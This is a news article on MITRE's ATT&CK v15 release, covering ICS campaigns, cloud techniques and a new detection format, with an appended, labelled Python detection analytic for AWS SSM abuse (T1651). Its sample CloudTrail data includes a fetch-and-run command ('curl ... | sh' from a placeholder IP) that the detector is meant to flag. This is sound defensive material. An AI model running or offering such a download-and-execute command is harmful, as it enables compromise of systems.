MITRE unveils ATT&CK v15 with upgraded detections, analytic format, cross-domain adversary insights

Non-profit organization MITRE has unveiled ATT&CK v15, introducing improved detections, a new analytic format, and cross-domain adversary insights. The latest release encompasses enhancements spanning Enterprise, Mobile, and ICS (industrial control system), touching on Techniques, Groups, Software, Campaigns, and Defenses. Notably, there is a significant emphasis on enhancing ATT&CK’s defensive recommendations through a revamped analytic format. 

Special attention has been given to incorporating detection analytics and guidance into the Execution Tactic of Enterprise ATT&CK, along with expanded defense coverage within the Cloud matrix.

“v15 is all about actionability and bringing defenders’ reality into focus — we prioritized what you need to detect, and how you can do it more effectively with detection engineering upgrades, and deeper intelligence insights across platforms,” Amy L. Robertson wrote in a Medium post on Tuesday. “This release also reflects the new expansion rhythm, balancing both well-known and emerging behaviors to reflect how trends and activity are experienced in the field.”

She highlighted that v16 will launch ICS sub-techniques, along with a structured cross-walk to enable mapping between deprecated and new techniques. “We’ll also be releasing new asset coverage and updates on our exploration into incorporating more sectors into the ICS matrix,” she wrote.

MITRE has been working to retrofit major incidents in the ICS space to improve understanding and showcase how ICS and enterprise techniques intersect in each event, Robertson detailed. v15 illuminates some of the ICS-Enterprise integration efforts with the release of four cross-mapped campaigns, starting with Triton, the 2017 attack on safety instrumented systems that shook the petrochemical industry to its core; and C0032, a campaign spanning various utilities from 2014 to 2017, often grouped with the petrochemical incident but distinctly different in nature.

Robertson also highlighted Unitronics, a campaign that targeted specific devices and had a significant impact on utilities and organizations globally. During this campaign, adversaries disrupted device interfaces to render them unusable for end users. “Fast forward to 2022 Ukraine Electric Power, where we witnessed a glimpse into the future of ICS attacks, with hypervisor features and shared domain access exploited to infiltrate ICS systems and unleash havoc. The campaign highlights key considerations regarding hypervisor usage across multiple domains and the abuse of native features in vendor software,” she added.

She added that the 2022 Ukraine Electric Power campaign also spawned two new ICS techniques featured in this release: T0895: Autorun Image and T0894: System Binary Proxy Execution via vendor application binaries.

Last week, Robertson outlined that ICS is leveling up this year. “Our goals include broadening ICS horizons with new asset coverage, exploring platform scope expansion, and continuing our multi-domain integration quest. We’ll also be diving deeper into adversary behaviors with the introduction of sub-techniques. v15 will showcase some of the integration efforts, with the release of cross-mapped campaigns. These campaigns track IT to OT attack sequences, helping defenders better understand multi-domain intrusions and informing unified defense strategies across technology environments.”

Moving to Enterprise in her latest post, Robertson said that with v15 “we were aiming for the perfect balance of familiar behaviors you’ve probably seen countless times (e.g., T1027.013: Obfuscated Files or Information: Encrypted/Encoded File, T1665: Hide Infrastructure), as well as newer, emerging trends. The shadowy domain of Resource Development was expanded to illuminate how adversaries are using generative artificial intelligence tools, like large language models (LLMs), to support various malicious activities (T1588.007: Obtain Capabilities: Artificial Intelligence).”

She added, “It’s not just about gaining initial access anymore — we added T1584.008: Compromise Infrastructure: Network Devices to capture how threat groups are hacking into third-party network devices, including small office/home office routers, to use these devices to facilitate further targeting.”

When it comes to the Cloud, Robertson pointed to the ATT&CK 2024 Roadmap that addresses the organization’s commitment to enhancing the Cloud matrix to be more approachable for defenders of all skill levels. “With this release, we focused on providing a broader set of defensive measures, resources, and insights for CI/CD pipelines, Infrastructure as Code (IaC), and Identity. v15 features new mitigations and data sources on token protection, along with more specific references to Okta logs. T1072: Software Deployment Tools was expanded to include broad execution of T1651: Cloud Administration Command, reflecting how threat actors are turning cloud native tools like AWS Systems Manager into remote access trojans,” she added.

“We ramped up resources for CI/CD pipelines and IaC, and made some refinements to Identity, with the expansion of T1484: Domain Policy Modification to include not just Azure AD, but also other identity-as-a-service providers like Okta,” according to Robertson. “T1556: Modify Authentication Process gained a new sub (T1556.009: Conditional Access Policies) exploring how threat actors have tampered with or disabled conditional access policies for ongoing access to compromised accounts. We also expanded T1136.003: Create Account: Cloud Account with additional service account insights.”

She also mentioned that v16 will feature robust identity and detection updates, as well as the platform rebalancing operations, “where we’re focusing on covering a wider range of cloud environments and threats, while making it more intuitive to prioritize techniques relevant to a specific platform.”

Robertson identified that MITRE expanded detections in v15 to assist detection engineering. “Previously, we structured our analytics in a pseudo format that was consistent with the Cyber Analytics Repository (CAR). In some cases, this was hard to understand. In v15, we transformed that format into a real-world query language style (like Splunk) that is compatible with various security tools. These upgrades are featured in detections across the framework including some techniques within the Execution tactic,” she added.

“Our aim with these upgrades is to reflect [that] the data source itself is the data you should be collecting and to provide an understandable format that pairs well with everyday defender tools (i.e., SIEMs and sensors),” according to Robertson. “We have also synced up some mitigations within the parent-to-sub-technique relationship. Our team has analyzed a list of sub-techniques that had mitigations that the parent technique did not have. In v15, you will find some parent techniques now reflect what mitigations are seen in the sub-technique.”
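As a worked illustration of the kind of analytic the two passages above refer to (the T1651: Cloud Administration Command expansion covering AWS Systems Manager used as a remote access tool, and the move to detections that name the data source you should actually be collecting), here is an added example that is not part of MITRE's post or of the ATT&CK content it describes. It runs a T1651-style analytic over constructed CloudTrail records for ssm:SendCommand, in plain Python rather than the Splunk-style query syntax the post mentions. The account IDs, ARNs, role names, instance IDs and command IDs are made up, and the EXPECTED_PRINCIPALS allowlist is a hypothetical tuning knob an organization would fill from its own automation roles.

```python
# Added example (not from the MITRE post): a detection analytic in the spirit of
# T1651 Cloud Administration Command, evaluated over constructed CloudTrail
# events. Data source: CloudTrail management events from ssm.amazonaws.com.
import json

# SSM documents that hand the caller arbitrary command execution on the
# managed instance. Routine documents (patching, inventory) are not flagged.
SCRIPT_DOCUMENTS = {"AWS-RunShellScript", "AWS-RunPowerShellScript"}

# Hypothetical allowlist: principals this environment expects to push ad-hoc
# scripts through SSM. Anything else using a script document is a finding.
EXPECTED_PRINCIPALS = {
    "arn:aws:sts::111122223333:assumed-role/PatchAutomationRole/patch-run",
}

# Constructed sample records (made-up account, ARNs, instance and command IDs).
# Field names mirror the CloudTrail schema for ssm:SendCommand.
SAMPLE_CLOUDTRAIL = r'''{"Records": [
 {"eventID": "e1", "eventTime": "2024-04-23T10:01:00Z", "eventSource": "ssm.amazonaws.com",
  "eventName": "SendCommand",
  "userIdentity": {"type": "AssumedRole", "arn": "arn:aws:sts::111122223333:assumed-role/PatchAutomationRole/patch-run"},
  "requestParameters": {"documentName": "AWS-RunPatchBaseline", "instanceIds": ["i-0a1", "i-0a2"]}},
 {"eventID": "e2", "eventTime": "2024-04-23T10:02:00Z", "eventSource": "ssm.amazonaws.com",
  "eventName": "SendCommand",
  "userIdentity": {"type": "AssumedRole", "arn": "arn:aws:sts::111122223333:assumed-role/PatchAutomationRole/patch-run"},
  "requestParameters": {"documentName": "AWS-RunShellScript", "instanceIds": ["i-0a1"],
                        "parameters": {"commands": ["yum -y update"]}}},
 {"eventID": "e3", "eventTime": "2024-04-23T10:03:00Z", "eventSource": "ssm.amazonaws.com",
  "eventName": "SendCommand",
  "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/dev-contractor"},
  "requestParameters": {"documentName": "AWS-RunShellScript", "instanceIds": ["i-0a1", "i-0a2", "i-0a3"],
                        "parameters": {"commands": ["curl -s http://198.51.100.7/a.sh | sh"]}}},
 {"eventID": "e4", "eventTime": "2024-04-23T10:04:00Z", "eventSource": "ssm.amazonaws.com",
  "eventName": "SendCommand", "errorCode": "AccessDeniedException",
  "userIdentity": {"type": "AssumedRole", "arn": "arn:aws:sts::111122223333:assumed-role/ReadOnlyAnalyst/session"},
  "requestParameters": {"documentName": "AWS-RunPowerShellScript", "instanceIds": ["i-0b9"]}},
 {"eventID": "e5", "eventTime": "2024-04-23T10:05:00Z", "eventSource": "ec2.amazonaws.com",
  "eventName": "DescribeInstances",
  "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/dev-contractor"},
  "requestParameters": {}}
]}'''


def load_records(raw_json):
    """Parse a CloudTrail log file body into its list of records."""
    return json.loads(raw_json)["Records"]


def analyze_ssm_commands(records, expected_principals=EXPECTED_PRINCIPALS):
    """Return one finding per SendCommand that uses a script document from an
    unexpected principal. Denied attempts are kept (succeeded=False): a caller
    probing for SSM execution rights is still worth a look."""
    findings = []
    for rec in records:
        if rec.get("eventSource") != "ssm.amazonaws.com" or rec.get("eventName") != "SendCommand":
            continue
        params = rec.get("requestParameters") or {}
        doc = params.get("documentName", "")
        if doc not in SCRIPT_DOCUMENTS:
            continue
        principal = (rec.get("userIdentity") or {}).get("arn", "")
        if principal in expected_principals:
            continue
        # The command text is only used for context; the analytic fires on the
        # document + principal combination even when parameters are absent.
        commands = (params.get("parameters") or {}).get("commands") or []
        findings.append({
            "technique": "T1651",
            "eventID": rec["eventID"],
            "eventTime": rec.get("eventTime"),
            "principal": principal,
            "document": doc,
            "targets": len(params.get("instanceIds") or []),
            "succeeded": "errorCode" not in rec,
            "command_preview": " ".join(commands)[:80],
        })
    return findings


if __name__ == "__main__":
    for finding in analyze_ssm_commands(load_records(SAMPLE_CLOUDTRAIL)):
        print(json.dumps(finding))
```

The allowlist is what keeps this from paging on every patch run; the point of pinning the analytic to the SendCommand event and the script documents, rather than to the command text, is that it still fires when CloudTrail does not carry the script body.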

She added, “As we gear up for October, we’ll be completing the Execution detections, refining Credential Access detections, diving into Cloud analytics, and restructuring our data sources for better accessibility.”

Addressing cyber threat intelligence, Robertson identified that “We’re working towards better reflecting the threat landscape by infusing the framework with more cybercriminal and underreported adversary activity. This release showcases new cybercriminal operations and highlights Malteiro, a criminal group believed to be based in Brazil. They are known for operating and distributing the Mispadu/URSA banking trojan through a malware-as-a-service model.” 

She pointed out that banking trojans, a notorious threat in Latin America, are increasingly spreading their chaos across borders, courtesy of malware developers selling tools to overseas operators. Malteiro’s operations exemplify this targeting shift, evident in a recent campaign affecting European entities across various sectors.

She added, “We’ll continue conducting thorough assessments of Groups, Software, and Campaigns to up the framework realism quotient and provide clearer insights into adversary activities. We’re also teaming up with ATT&CK domain leads to expand coverage of cross-domain intrusions.”

Robertson also said that MITRE has been working “towards our goals of enhancing Navigator’s usability and streamlining processes for ATT&CK Workbench. Most importantly, we’re taking our TAXII server to new heights, and by December 18, we’ll be retiring the TAXII 2.0 server and transitioning to the upgraded TAXII 2.1 version. You can locate the documentation for the TAXII 2.1 server in our GitHub repository.”

“We’ll be continuing to enhance usability on ATT&CK Workbench and Navigator, and building towards swifter Groups and Software releases,” she added.
